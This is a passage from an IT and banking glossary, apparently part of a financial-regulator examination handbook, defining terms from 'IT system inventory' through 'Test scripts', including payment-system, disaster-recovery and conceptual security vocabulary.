the organization’s technology management and contains high-level goals and plans for all areas of information technology that affect the business, not just the infrastructure. The plan should include areas that impact technology management, including cost management, human capital management, hardware and software management, third-party management, risk management, and all other considerations in the enterprise IT environment. IT system inventory - A list containing information about the information resources owned or operated by an organization. Iterative - Repetitive or cyclical. Iterative software development involves the completion of project tasks or phases in repetitive cycles. Tasks and phase activities are repeated until a desired result is achieved.JJailbreaking - A method of removing the manufacturer’s device controls or core operating system controls to provide a user with additional access to and control over the device’s operating and file systems, including the ability to circumvent security controls.KKey fob - A small portable device equipped with chip technology allowing the holder the ability to access network systems, such as those used for payments, and to store personal data.Kiosk - A publicly accessible computer terminal that permits customers to directly communicate with the financial institution via a network. LLAN - Local Area Network.LAR - Legal amount recognition. The handwritten dollar amount of the check.Large value funds transfer system - A wholesale payment system used primarily by financial institutions in which large values of funds are transferred between parties. Fedwire® and CHIPS are the two large-value transfer systems in the United States.Legacy systems - A term commonly used to refer to existing computers systems and applications with which new systems or applications must exchange information.Life-cycle process - The multi-step process that starts with the initiation, analysis, design, and implementation, and continues through the maintenance and disposal of the system.Lockbox - Deposit mechanism used by commercial firms and businesses to facilitate their deposit transaction volume. Typically, commercial firms and businesses direct customers to send payments directly to a financial institution address or post office box controlled by the institution. Financial institution personnel record payments received and prepare deposit slips, and subsequent processing proceeds as with other deposit taking activities.Lockout - The action of temporarily revoking network or application access privileges, normally due to repeated unsuccessful logon attempts.Long position - In respect of a currency balance that is greater than zero, the amount by which such currency balance is greater than zero. A position that appreciates in value if market prices increase. When one buys a currency, their position is long.MMagnetic ink character recognition (MICR) - Magnetic codes found on the bottom of checks, deposit slips, and general ledger debit and credit tickets that allow a machine to scan (capture) the information. MICR encoding on a check includes the account number, the routing number, the serial number of the check, and the amount of the check. The amount of the check is encoded when the proof department processes the check. Mainframe - An industry term for a large computer, typically used for the commercial applications of businesses and other large-scale computing purposes. Generally, a mainframe is associated with centralized rather than distributed computing. Malware - Software designed to secretly access a computer system without the owner’s informed consent. The expression is a general term (short for malicious software) used to mean a variety of forms of hostile, intrusive, or annoying software or program code. Malware includes computer viruses, worms, trojan horses, spyware, dishonest adware, ransomware, crimeware, most rootkits, and other malicious and unwanted software or programs.Man-in-the-middle attack - Places the attacker’s computer in the communication line between the server and the client. The attacker’s machine can monitor and change communications.Market-wide tests - Market-wide tests are also called cross-market tests or “street tests” that are sponsored by the Securities Industry Association, Bond Market Association, and Futures Industry Association. These tests validate the connectivity from alternate sites and include transaction, settlement, and payment processes, to the extent practical.Matched instructions - Two Instructions in which the information set forth in a specific CLS Bank Rule is matched in accordance with the parameters and procedures set forth in the CLS Bank Rules.Matching - With respect to compared and non-compared transactions, the process of comparing the trade or settlement details provided by counterparties to ensure they agree with respect to the terms of the transaction. Also called comparison checking.Media - Physical objects that store data, such as paper, hard disk drives, tapes, and compact disks (CDs).Merchant acquirer - Bankcard association members that initiate and maintain contractual agreements with merchants for the purpose of accepting and processing bankcard transactions. Merchant processing - Activity for the acceptance and settlement of bankcard products and transactions from merchants through the payment system.Metric - A quantitative measurement.MICR - MICR (1) - Magnetic ink character recognition. Magnetic codes found on the bottom of checks, deposit slips, and general ledger debit and credit tickets that allow a machine to scan (capture) the information. MICR encoding on a check includes the account number, the routing number, the serial number of the check and the amount of the check. The amount of the check is encoded when the proof department processes the check.Microwave technology - Narrowband technology that requires a direct line-of-sight to transmit voice and data communications and is used to integrate a broad range of fixed and mobile communication networks.Midrange - Computers that are more powerful and capable than personal computers but less powerful and capable than mainframe computers.Midrange (1) - Computers that are more powerful and capable than personal computers but less powerful and capable than mainframe computers.Milestone - A major project event.MIPS - Millions of instructions per second. A general measure of computing performance and, by implication, the amount of work a larger computer can do.Mirroring - A process that copies data to multiple disks over a computer network in real time or close to real time. Mirroring reduces network traffic, ensures better availability of the website or files, or enables the site or downloaded files to arrive more quickly for users close to the mirror site.MIS - Management information systems. A general term for the computer systems in an enterprise that provide information about its business operations. Mnemonic - A symbol or expression that can help someone remember something. For example, the phrase “Hello! My name is Bill. I'm 9 years old.” might help an individual remember a secure 10-character password of “H!MniBI9yo.”Mobile application - Downloadable software applications developed specifically for use on mobile devices. Mobile financial applications are developed by or for financial institutions to allow customers to perform account inquiries, retrieve information, or initiate financial transactions. Mobile device - A portable computing and communications device with information-storage capability.Mobile device security - Controls to protect unauthorized access to or activities through portable computing and communications devices.Mobile financial services - The products and services that a financial institution provides to its customers through mobile devices.Mobile P2P - Payments initiated on a mobile device using the recipient’s mobile phone number, e-mail address, or other identifier. Mobile payment - A transfer of value via a mobile device.Mobile wallet - A front-end application that stores payment card information on the mobile device and allows payments to be made using a mobile device. The mobile wallet utilizes traditional retail payment channels such as ACH, EFT, and debit/credit card networks to process the payments.Mobile-enabled Web sites - A Web site is designed to detect the type of device the customer is using (e.g., mobile device or desktop computer) and displays Web pages in the best format for that device.Modeling - The process of abstracting information from tangible processes, systems and/or components to create a paper or computer-based representation of an enterprise-wide or business line activity. Module - A combination of various components of a business process or supporting system. Module test/exercise - A test designed to verify the functionality of multiple components of a business line or supporting function at the same time. Multi-factor authentication - The process of using two or more factors to achieve authentication. Factors include something you know (e.g., password or personal identification number); something you have (e.g., cryptographic identification device or token); and something you are (e.g., biometric).Multilateral netting settlement system - Multilateral netting is an arrangement among three or more parties to net their obligations. In these settlement systems transfers are irrevocable but are only final after the completion of end-of-day-settlement.Multiplexers - A device that encodes or multiplexes information from two or more data sources into a single channel. They are used in situations where the cost of implementing separate channels for each data source is more expensive than the cost and inconvenience of providing the multiplexing/de-multiplexing functions.NNACHA – The Electronic Payments Association (NACHA) - The national association that establishes the rules and procedures governing the exchange of ACH payments.NAS - Network attached storage. Hard disk storage set up with its own network address rather than being attached to the department computer that is serving applications to a network's workstation users. By removing storage access and its management from the department server, both application programming and files can be served faster because they are not competing for the same processor resources. The network-attached storage device is attached to a local area network (typically, an Ethernet network) and assigned an IP address. File requests are mapped by the main server to the NAS file server.National Institute of Standards and Technology (NIST) - An agency of the U.S. Department of Commerce that works to develop and apply technology, measurements, and standards. NIST developed a voluntary cybersecurity framework based on existing standards, guidelines, and practices for reducing cyber risks to critical infrastructures.National Settlement Service (NSS) - Also referred to as Deferred Net Settlement. The Federal Reserve Banks’ multilateral settlement service. NSS is offered to depository institutions that settle for participants in clearinghouses, financial exchanges, and other clearing and settlement groups. Settlement agents acting on behalf of those depository institutions electronically submit settlement files to the Federal Reserve Banks. Files are processed on receipt, and entries are automatically posted to the depository institutions’ Reserve Bank accounts. Entries are final when posted.Near field communication (NFC) - A wireless protocol that allows for exchange of payment credentials stored on the mobile device and other data at close range.Net debit cap - The maximum dollar amount of uncollateralized daylight overdrafts that an institution is authorized to incur in its Federal Reserve account. The net debit cap is generally equal to an institution’s capital times the cap multiple for its cap category.Network - Two or more computer systems that are grouped together to share information, software, and hardware.Network activity baseline - A base for determining typical utilization patterns so that significant deviations can be detected.Network administrator - The individual responsible for the installation, management, and control of a network.Network attached storage (NAS) - NAS systems usually contain one or more hard disks that are arranged into logical, redundant storage containers much like traditional file servers. NAS provides readily available storage resources and helps alleviate the bottlenecks associated with access to storage devices. Network diagram - A description of any kind of locality in terms of its physical layout. In the context of communication networks, a topology describes pictorially the configuration or arrangement of a network, including its nodes and connecting communication lines.Network security - The protection of computer networks and their services from unauthorized entry, modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and that there are no harmful side effects. Network security includes providing for data integrity.Non-repudiation - Ensuring that a transferred message has been sent and received by the parties claiming to have sent and received the message. Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message.OObject code - Software program instructions compiled (translated) from source code into machine-readable formats.Object Program - A program that has been translated into machine language and is ready to be run (i.e., executed) by the computer.Office of Foreign Asset Control (OFAC) - The Office of Foreign Assets Control, United States Department of the Treasury, administers and enforces economic sanctions programs primarily against countries and groups of individuals such as terrorists and narcotics traffickers. The sanctions can be either comprehensive or selective, using the blocking of assets and trade restrictions to accomplish foreign policy and national security goals.Offsite rotation - Used for backup and/or disaster recovery; moving a copy of the most current database, information, file, or tape to an offsite storage facility to be used only in an emergency.One-time password - A password that is valid for only one login session or transaction on a computer system or other digital device.On-us checks - Checks that are deposited into the same institution on which they are drawn.Open market operations - The buying and selling of government securities in the open market in order to expand or contract the amount of money in the banking system.Operating system - A system that supports and manages software applications. Operating systems allocate system resources, provide access and security controls, maintain file systems, and manage communications between end users and hardware devices.Operational IT plan - Typically, the plans that are made by front-line, or low-level, IT managers. Operational IT plans are focused on the specific procedures and processes that implement the larger strategic plan.Operational risk - The risk of failure or loss resulting from inadequate or failed processes, people, or systems.Originating depository financial institution (ODFI) - A participating financial institution that originates entries at the request of and by agreement with its originators in accordance with the provisions of the NACHA rules.Originator - A person that has authorized an ODFI to transmit a credit or debit entry to the deposit account of a receiver at an RDFI.Outsourcing - The practice of contracting with another entity to perform services that might otherwise be conducted in-house. Contracted relationship with a third party to provide services, systems, or support.OWASP - An online community dedicated to Web application security.PP2P - Peer-to-peer communication, the communications that travel from one user’s computer to another user’s computer without being stored for later access on a server. E-mail is not a P2P communication since it travels from the sender to a server, and is retrieved by the recipient from the server. On-line chat, however, is a P2P communication since messages travel directly from one user to another.Pandemic - An epidemic or infectious disease that can have a worldwide impact.Passwords - A secret sequence of characters that is used as a means of authentication. Patch - Software code that replaces or updates other code. Frequently patches are used to correct security flaws.Patching - Software code that replaces or updates other code. Frequently patches are used to correct security flaws.Paying bank - A paying bank is the institution where a check is payable and to which it is sent for payment.Payment - A transfer of value.Payment system - The mechanism, the rules, institutions, people, markets, and agreements that make the exchange of payments possible.Payments System Risk Policy (PSR) - The Federal Reserve’s Payments System Risk (PSR) policy addressing the risks that payment systems present to the Federal Reserve Banks, the banking system, and to other sectors of the economy. Payroll card account - A bank account that is established directly or indirectly by an employer on behalf of an employee to which an electronic funds transfers the employee’s wages or compensation on a recurring basis. The payroll card, often branded by one of the credit/debit card associations, provides the employee access to the funds. PBX - Private branch exchange. A telephone system within an enterprise that switches calls between enterprise users on local lines while allowing all users to share a certain number of external phone lines.PCI Security Standards Council - The governing body, representing key participants of the payment card industry, which establishes and maintains security standards for payment cards.Penetration test - The process of using approved, qualified personnel to conduct real-world attacks against a system to identify and correct security weaknesses before they are discovered and exploited by others. Permanent virtual circuit (PVC) - PVC is a pathway through a network that is predefined and maintained by the end systems and nodes along the circuit, but the actual pathway through the network may change due to routing problems. The PVC is a fixed circuit that is defined in advance by the public network carrier. Refer to switched virtual circuit for an additional virtual circuit option.Personal digital assistant (PDA) - A pocket-sized, special-purpose personal computer that lacks a conventional keyboard.Person-to-person (P2P) payment - Online payments using electronic mail messages to invoke a transfer of value between the parties over existing proprietary networks as on-us transactions.Phase - A project segment.Phishing - A digital form of social engineering that uses authentic-looking — but bogus — e-mail to request information from users or direct them to fake Web sites that request information.Platform - The underlying computer system on which applications programs run. A platform consists of an operating system, the computer system's coordinating program, which in turn is built on the instruction set for a processor or microprocessor, and the hardware that performs logic operations and manages data movement in the computer. POD - Proof of deposit. The verification of the dollar amount written on a negotiable instrument being deposited. Point-of-sale (POS) network - A network of institutions, debit cardholders, and merchants that permit consumers to make direct payment electronically at the place of purchase. The funds are withdrawn from the account of the cardholder.Pop-up box - A dialog box that automatically appears when a person accesses a webpage.Port - Either an endpoint to a logical connection or a physical connection to a computer.POTS - Plain old telephone system. Basic telephone service.Presentment fee - A fee that an institution receiving a check may impose on the institution that presents the check for payment. No presentment fee may be charged for checks presented by 8 a.m. local time.Preventive control - A mitigating technique designed to prevent an event from occurring.Principle of least privilege - The security objective of granting users only the access needed to perform official duties.Private key infrastructure (PKI) - The use of public key cryptography in which each customer has a key pair (e.g., a unique electronic value called a public key and a mathematically-related private key). The private key is used to encrypt (sign) a message that can only be decrypted by the cor-responding public key or to decrypt a message previously encrypted with the public key. The public key is used to decrypt a message previously encrypted (signed) using an individual's private key or to encrypt a message so that it can only be decrypted (read) using the intended recipient’s private key. Private label card - See "Store Card".Privileged access - Individuals with the ability to override system or application controls.Project - A task involving the acquisition, development, or maintenance of a technology product.Project management - Planning, monitoring, and controlling an activity.Protocol - A format for transmitting data between devices.Protocol "2" - A standard way of carrying out data transmission between
computers.Proxy server - An Internet server that controls client computers’ access to the Internet. Using a proxy server, a company can stop employees from accessing undesirable websites, improve performance by storing webpages locally, and hide the internal network's identity so monitoring is difficult for external users.Public key - See "PKI".QQR code - A type of two-dimensional bar code or machine-readable optical label that contains information about the item to which it is attached.RRAID - Redundant array of independent disks. The use of multiple hard disks to store the same data in different places. By placing data on multiple disks, I/O operations can overlap in a balanced way, improving performance. Since multiple disks increase the mean time between failures (MTBF), storing data redundantly also increases fault-tolerance. Real time gross settlement (RTGS) System - A type of payments system operating in real time rather than batch processing mode. It provides immediate finality of transactions. Gross settlement refers to the settlement of each transfer individually rather than netting. FedwireÒ is an example of a real time gross settlement system.Real-time network monitoring - Immediate response to a penetration attempt that is detected and diagnosed in time to prevent access.Receiver - An individual, corporation, or other entity that has authorized a company or an originator to initiate a credit or debit entry to a transaction account belonging to the receiver held at its RDFI.Receiving depository financial institution (RDFI) - Any financial institution qualified to receive debits or credits through its ACH operator in accordance with the ACH rules.Reciprocal agreement - An agreement whereby two organizations with similar computer systems agree to provide computer processing time for the other in the event one of the systems is rendered inoperable. Processing time may be provided on a “best effort” or as “time available” basis; therefore, reciprocal agreements are not usually acceptable as a primary recovery option.Reconverting bank (Check 21) - The financial institution that creates a substitute check. With respect to a substitute check that was created by a person that is not a financial institution, the reconverting bank is the first financial institution that transfers, presents, or returns that substitute check or, in lieu thereof, the first paper or electronic representation of that substitute check. The reconverting bank warrants that (1) the substitute check is the legal equivalent of the original check; and (2) the original check cannot be presented again in any form so the customer pays the check only once.Recovery point objective (RPO) - The amount of data that can be lost without severely impacting the recovery of operations or the point in time in which systems and data must be recovered (e.g., the date and time of a business disruption).Recovery point objectives (RPOs) - RPOs represent the amount of data that can be lost without severely impacting the recovery of operations or the point in time in which systems and data must be recovered (e.g., the date and time of a business disruption). Recovery service levels - Collectively, terms that define the speed, quality, and quantity of recovery capability in response to a disaster, including recovery time objective, recovery point objective, timely notification, percentage of normal production service level agreements (SLAs) that will be delivered during recovery mode, etc.Recovery site - An alternate location for processing information (and possibly conducting business) in an emergency. Usually distinguished as “hot” sites that are fully configured centers with compatible computer equipment and “cold” sites that are operational computer centers without the computer equipment.Recovery time objective (RTO) - The maximum allowable downtime that can occur without severely impacting the recovery of operations or the time in which systems, applications, or business functions must be recovered after an outage (e.g. the point in time that a process can no longer be inoperable). Recovery time objectives (RTOs) - RTOs represent the maximum allowable downtime that can occur without severely impacting the recovery of operations or the time in which systems, applications, or business functions must be recovered after an outage (e.g. the point in time that a process can no longer be inoperable). Recovery vendors - Organizations that provide recovery sites and support services for a fee. Red team - A group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. The red team’s objective is to improve enterprise information assurance by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders in an operational environment.Regulation CC - A regulation (12 CFR 229) promulgated by the Board of Governors of the Federal Reserve System regarding the availability of funds and the collection of checks. The regulation governs the availability of funds deposited in checking accounts and the collection and return of checks.Regulation E - A regulation (12 CFR 205) promulgated by the Board of Governors of the Federal Reserve System to ensure consumers a minimum level of protection in disputes arising from electronic fund transfers.Regulation Z - Regulation Z, the Truth in Lending Act (TILA) (12 CFR 226) promulgated by the Board of Governors of the Federal Reserve System. The regulation prescribes uniform methods for computing the cost of credit, disclosing credit terms, and resolving errors on certain types of credit accounts.Remittance cards - Payment cards that are typically used to facilitate cross-border movement of funds by individuals and for person-to-person transactions.Remote access - The ability to obtain access to a computer or network from a remote location.Remote capture - Process that is used to scan and transmit check images and data electronically.Remote control software - Software that is used to obtain access to a computer or network from a remote distance.Remote deposit capture (RDC) - A service that enables users at remote locations to scan digital images of checks and transmit the captured data to a financial institution or a merchant that is a customer of a financial institution.Remote journaling - Process used to transmit journal or transaction logs in real time to a back-up location.Remotely created check (RCC) - A check that is drawn on a customer account at a financial institution, is created by the payee, and does not bear a signature in the format agreed to by the paying financial institution and customer. RCCs are also known as “demand drafts,” “telechecks,” “preauthorized drafts,” “paper drafts,” or “digital checks.” Removable media - Portable electronic storage media, such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device and which is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. Examples include hard disks, floppy disks, zip drives, compact disks (CD), thumb drives, pen drives, and similar storage devices.Replay attack - The interception of communications, such as an authentication communication, and subsequently impersonation of the sender by retransmitting the intercepted communication.Repudiation - The denial by one of the parties to a transaction of participation in all or part of that transaction or of the content of the communication.Reserve account - A non-interest-earning balance account institutions maintain with the Federal Reserve Bank or with a correspondent bank to satisfy the Federal Reserve’s reserve requirements. Reserve account balances play a central role in the exchange of funds between depository institutions.Reserve requirements - The percentage of deposits that a depository institution may not lend out or invest and must hold either as vault cash or on deposit at a Federal Reserve Bank. Reserve requirements affect the potential of the banking system to create transaction deposits.Residual risk - The amount of risk remaining after the implementation of controls.Resilience - The ability of an institution to recover from a significant disruption and resume critical operations.Resilience testing - Testing of an institution’s business continuity and disaster recovery resumption plans.Retail payments - Payments, typically small, made in the goods and services market.Retention requirement - Requirement established by a company or by regulation for the length of time and/or for the amount of information that should be retained.Return (ACH) - Any ACH entry that has been returned to the ODFI by the RDFI or by the ACH operator because it cannot be processed. The reason for each return is included with the return in the form of a “return reason code.” (See the NACHA “Operating Rules and Guidelines” for a complete reason code listing.)Risk - The potential that events, expected or unanticipated, may have an adverse effect on a financial institution’s earnings, capital, or reputation.Risk analysis - The process of identifying risks, determining their probability and impact, and identifying areas needing safeguards; Risk analysis is an integral part of risk management.Risk assessment - A prioritization of potential business disruptions based on severity and likelihood of occurrence. The risk assessment includes an analysis of threats based on the impact to the institution, its customers, and financial markets, rather than the nature of the threat. Risk identification - The process of determining risks and existing safeguards. It generally includes inventories of systems and information necessary to operations and defines the potential threats to systems and operations.Risk management - The total process required to identify, control, and minimize the impact of uncertain events. The objective of a risk management program is to reduce risk and obtain and maintain appropriate management approval at predefined stages in the life cycle.Risk measurement - A process to determine the likelihood of an adverse event or threat occurring and the potential impact of such an event on the institution. The result of risk measurement leads to the prioritization of potential risks based on severity and likelihood of occurrence. Risk mitigation - The process of reducing risks through the introduction of specific controls and risk transfer. It includes the implementation of appropriate controls to reduce the potential for risk and bring the level of risk in line with the board’s risk appetite.Rlogin - Remote login. A UNIX utility that allows a user to login to a remote host on a network, as if it were directly connected, and make use of various services. Remote login is an information exchange between network-connected devices where the information cannot be reliably protected end-to-end by a single organization’s security controls. Rogue code - In programming, rogue code is another term for code that constitutes a virus.Rogue wireless access - An unauthorized wireless node on a network.Root user - The conventional name of the user who has all rights or permissions to all files and programs. Having such rights or permissions allow the root user to do many things an ordinary user cannot.Router - A hardware device that connects two or more networks and routes incoming data packets to the appropriate network.Routing - The process of moving information from its source to the destination.Routing number - Also referred to as the ABA number. A nine-digit number (eight digits and a check digit) that identifies a specific financial institution.SSandbox - A restricted, controlled execution environment that prevents potentially malicious software, such as mobile code, from accessing any system resources except those for which the software is authorized. SAS 70 report - An audit report of a servicing institution prepared in accordance with guidance provided in the American Institute of Certified Public Accountant's Statement of Auditing Standards Number 70.Satellite technology - These links efficiently extend the reach of typical communication systems to distant areas and provide alternative traffic routing in an emergency.Scalability - A term that refers to how well a hardware and software system can adapt to increased demands. For example, a scalable network system would be one that can start with just a few nodes but can easily expand to thousands of nodes. Scalability can be a very important feature because it means the entity can invest in a system with confidence they will not quickly outgrow it. Scenario analysis - The process of analyzing possible future events by considering alternative possible outcomes.Scorecard - A dashboard of performance measures.Script - A file containing active content; for example, commands or instructions to be executed by the computer.SCSI - Small computer systems interface (pronounced ”scuzzy”). A standard way of interfacing a computer to disk drives, tape drives, and other devices that require high-speed data transfer. Also, a secondary SAN protocol that allows computer applications to talk to storage devices.SDLC - Systems development life cycle. The stages through which software evolves from an idea to implementation.Secure coding techniques - The process of developing code (e.g., Web application) with security built in during the development process using technical controls to mitigate the occurrence of software vulnerabilities.Security architecture - A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements.Security Audit - An independent review and examination of system records and activities to test for adequacy of system controls, ensure compliance with established policy and operational procedures, and recommend any indicated changes in control, policy, and procedures.Security breach - A security event that results in unauthorized access of data, applications, services, networks, or devices by bypassing underlying security mechanisms. Security event - An event that potentially compromises the confidentiality, integrity, availability, or accountability of an information system.Security log - A record that contains login and logout activity and other security-related events and that is used to track security-related information on a computer system. Security posture - The security status of an enterprise’s networks, information, and systems based on information security and assurance resources (e.g., people, hardware, software, and policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes.Security procedure agreement - An agreement between a financial institution and a Federal Reserve Bank whereby the financial institution agrees to certain security procedures if it uses an encrypted communications line with access controls for the transmission or receipt of a payment order to or from a Federal Reserve Bank.Security Violation - An instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information or system resources.Sensitive customer information - A customer’s name, address, or telephone number, in conjunction with the customer’s social security number, driver’s license number, account number, credit or debit card number, or a personal identification number or password that would permit access to the customer’s account. Sensitive customer information also includes any combination of components of customer information that would allow someone to log onto or access the customer’s account, such as user name and password or password and account number.Server - A computer or other device that manages a network service. An example is a print server, which is a device that manages network printing.Service level agreement (SLA) - Formal documents between an institution and its third-party provider that outline an institution’s predetermined requirements for a service and establish incentives to meet, or penalties for failure to meet, the requirements. SLAs should specify and clarify performance expectations, establish accountability, and detail remedies or consequences if performance or service quality standards are not met.Service Level Agreement (SLA) - Formal documents that outline the institution's predetermined requirements for the service and establish incentives to meet, or penalties for failure to meet, the requirements. They should specify and clarify performance expectations, establish accountability, and detail remedies or consequences if performance or service quality standards are not met.Service Provider - Also referred to as a technology service provider (TSP). Among a broad range of entities, including affiliated entities, non-affiliated entities, and alliances of companies providing products and services. Other terms used to describe service providers include vendors, subcontractors, external service providers, application service providers, and outsourcers.Settlement - The final step in the transfer of ownership involving the physical exchange of securities or payment. In a banking transaction, settlement is the process of recording the debit and credit positions of the parties involved in a transfer of funds. In a financial instrument transaction, settlement includes both the transfer of securities by the seller and the payment by the buyer. Settlements can be “gross” or “net.” Gross settlement means each transaction is settled individually. Net settlement means parties exchanging payments will offset mutual obligations to deliver identical items (e.g., dollars or EUROS), at a specified time, after which only one net amount of each item is exchanged.Settlement date (ACH) - The date on which an exchange of funds with respect to an entry is reflected on the books of the Federal Reserve Bank.Settlement eligible instructions - See "Matched Instructions". Short message service - A text messaging service component of phone, Web, or mobile communication systems. SMS uses standardized communications protocols to allow devices to exchange short text messages. Also known as text messaging.Short position - In respect of a currency balance that is less than zero, the amount by which such currency balance is less than zero. An investment position that benefits from a decline in market price. When one sells a currency their position is short.Short position limit - In respect of an eligible currency, the maximum short position a Settlement Member may have at any time in that eligible currency and, unless otherwise reduced pursuant to the CLS Bank Rules, shall equal (i) the total amount of all available committed liquidity facilities in such eligible currency (or such lesser amount that CLS Bank may determine from time to time) minus (ii) the amount of the largest available committed liquidity facility among such liquidity facilities (after taking into account any amounts already drawn. Significant firms - Firms that process a significant share of transactions in critical financial markets. Simulated loss of data center site(s) test/exercise - A type of disaster recovery test that involves the simulation of the loss of the primary, alternate, and/or tertiary data processing sites to verify that the institution can continue its data processing activities. Simulation - The process of operating a model of an enterprise-wide or business line activity in order to test the functionality of the model. Computer systems may support the simulation of business models to aid in evaluating the BCP. Single-Entry (ACH) - A one-time transfer of funds initiated by an originator in accordance with the receiver’s authorization for a single ACH credit or debit to the receiver's consumer account.SLA - Service level agreement. SLAs detail the responsibilities of an IT service provider, the rights of the service provider’s customers, and the penalties assessed when the service provider violates any element of the SLA. SLAs also identify and define the service offering itself, plus the supported products, evaluation criteria, and quality of service customers should expect. SLAs are typically measured in terms of metrics. Examples include processing completion times and systems availability times. Smart cards - A card with an embedded computer chip on which information can be stored and processed.Sniffing - The passive interception of data transmissions.Social engineering - A general term for trying to trick people into revealing confidential information or performing certain actions.SONET - Synchronous optical network. A standard that defines interface standards for connecting fiber-optic transmission systems. Sound practices - Defined in the “Interagency Paper on Sound Practices to Strengthen the Resilience of the U.S. Financial System,” which was issued by the Board of Governors of the Federal Reserve System, Office of the Comptroller of the Currency, and Securities and Exchange Commission. Source code - Software program instructions written in a format (language) readable by humans.Source program - A program written in a programming language (such as C, Pascal, or COBOL). A compiler translates the source code into a machine-language object program.Spear phishing - An attack targeting a specific user or group of users, and attempts to deceive the user into performing an action that launches an attack, such as opening a document or clicking a link. Spear phishers rely on knowing some personal piece of information about their target, such as an event, interest, travel plans, or current issues. Sometimes this information is gathered by hacking into the targeted network. Spiral development - An iterative project management model that focuses on the identification of project and product risks and the selection of project management techniques that best control the identified risks.Split Processing - The ongoing operational practice of dividing production processing between two or more geographically dispersed facilities.Spoofing - A form of masquerading where a trusted IP address is used instead of the true IP address as a means of gaining access to a computer system.Spot - The most common foreign exchange transaction. Spot or spot date refers to the spot transaction value date that requires settlement within two business days, subject to value date calculation.SQL Injection Attack - An exploit of target software that constructs structure query language (SQL) statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. Sreen scraping - A process used by information aggregators to gather information from a customer’s website, whereby the aggregator accesses the target site by logging in as the customer, electronically reads and copies selected information from the displayed webpage(s), then redisplays the information on the aggregator’s site. The process is analogous to “scraping” the information off the computer screen. SSL (secure socket layer) - An encryption system developed by Netscape. SSL protects the privacy of data exchanged by the website and the individual user. It is used by websites whose names begin with https instead of http.Standard Entry Class (SEC) code - Three-character code in an ACH company/batch header record used to identify the payment type within an ACH batch.Stateful inspection - A firewall inspection technique that examines the claimed purpose of a communication for validity. For example, a communication claiming to respond to a request is compared to a table of outstanding requests.Storage area network (SAN) - SAN represents several storage systems that are interconnected to form one back-up network, which allows various systems to be connected to any storage device and prevents dependence on a single line of communication.Storage virtualization - The process of taking many different physical storage networks and devices, and making them appear as one “virtual” entity for purposes of management and administration.Store card - A credit card issued by a financial institution for a specific merchant or vendor that does not carry a bankcard association logo. Store cards can only be used at the merchant or vendor whose name appears on the front of the card.Stored-value card - A card-based payment system that assigns a value to the card. The card’s value can be stored on the card itself (i.e., on the magnetic stripe or in a computer chip) or in a network database. As the card is used for transactions, the transaction amounts are subtracted from the card’s balance. As the balance approaches zero, some cards can be "reloaded" through various methods and others are designed to be discarded. These cards are often used in closed systems for specific types of purchases.Stovepipe application - Stand-alone programs that may not easily integrate with other applications or systems.Street tests - Street tests are also called cross-market tests or market-wide tests that are sponsored by the Securities Industry Association, Bond Market Association, and Futures Industry Association. These tests validate the connectivity from alternate sites and include transaction, settlement, and payment processes, to the extent practical. Substitute check (Check 21) - Also known as the Image Replacement Document (IRD). A paper reproduction of an original check that (1) contains an image of the front and back of the original check; (2) bears a MICR line that, except as provided under ANS X9.100-140, contains all the information appearing on the MICR line of the original check when it was issued and any additional information that was encoded on the original check’s MICR line before an image of the original check was captured; (3) conforms in paper stock, dimension, and otherwise with ANS X9.100-140; and (4) is suitable for automated processing in the same manner as the original check. The Federal Reserve Board of Governors can by rule or order determine different standards. Suspicious activity report (SAR) - Reports required to be filed by the Bank Secrecy Act when a financial institution identifies or suspects fraudulent activity. Sustainability - The period of time for which operations can continue at an alternate processing facility. Switch - A device that connects more than two LAN segments that use the same data link and network protocol. Switched virtual circuit (SVC) - SVC is a temporary connection between workstations that is disabled after communication is complete. Refer to Permanent Virtual Circuit (PVC) for an additional communication method using circuits.Synchronous data replication - A process for copying data from one source to another in which an acknowledgement of the receipt of data at the copy location is required for application processing to continue. Consequently, the content of databases stored in alternate facilities is identical to those at the original storage site, and copies of data contain current information at the time of a disruption in processing.System administration - The process of maintaining, configuring, and operating computer systems.System resources - Capabilities that can be accessed by a user or program either on the user’s machine or across the network. Capabilities can be services, such as file or print services, or devices, such as routers.Systems develop- ment life cycle - An approach used to plan, design, develop, test, and implement an application system or a major modification to an application system.Systems development life cycle - An approach used to plan, design, develop, test, and implement an application system or a major modification to an application system. Systems development life cycle (SDLC) process - The scope of activities associated with a system, encompassing the system’s initiation, development and acquisition, implementation, operation and maintenance, and ultimately its disposal that instigates another system initiation.TT-1 line - A special type of telephone line for digital communication and transmission. T-1 lines provide for digital transmission with signaling speed of 1.544Mbps (1,544,000 bits per second). This is the standard for digital transmissions in North America. Usually delivered on fiber optic lines.Table top exercise/structured walk-through test - Tactical plan - Typically, a short-term plan that establishes the specific steps needed to implement a company’s strategic plan. These plans are often created by mid-level managers.TCP/IP - Transmission control protocol/Internet protocol. A communication standard for transmitting data packets from one computer to another. TCP/IP is used on the Internet and other networks. The two parts of TCP/IP are TCP, which deals with constructions of data packets, and IP, which routes them from machine to machine. Telecommunications - The exchange of information over significant distances by electronic means.Telnet - An interactive, text-based communications session between a client and a host. It is used mainly for remote login and simple control services to systems with limited resources or to systems with limited needs for security.Terminal services - A component of Microsoft Windows operating systems (both client and server versions) that allows a user to access applications or data stored on a remote computer over a network connection.Test assumptions - The concepts underlying an institution’s test strategies and plans. Test key - Internal controls used to verify the authenticity of incoming wire requests involve the use of test keys. A test key is a formula used to develop or interpret test codes or test words. Test codes or words consist of a series of numbers signifying different types of information and usually precede the text of the message. As an example, a test code may contain a bank number, the amount of the transaction, and a number indicating the day and week of the month. As an additional precaution, many test codes contain a variable (sequence number) based on the number of messages received. Test plan - A document that is based on the institution’s test scope and objectives and includes various testing methods. Test scenario - A potential event, identified as the operating environment for a business continuity or disaster recovery test, which the institution’s recovery and resumption plan must address. Test scripts - Documents that define the specific activities, tasks, and steps that test participants will conduct during the 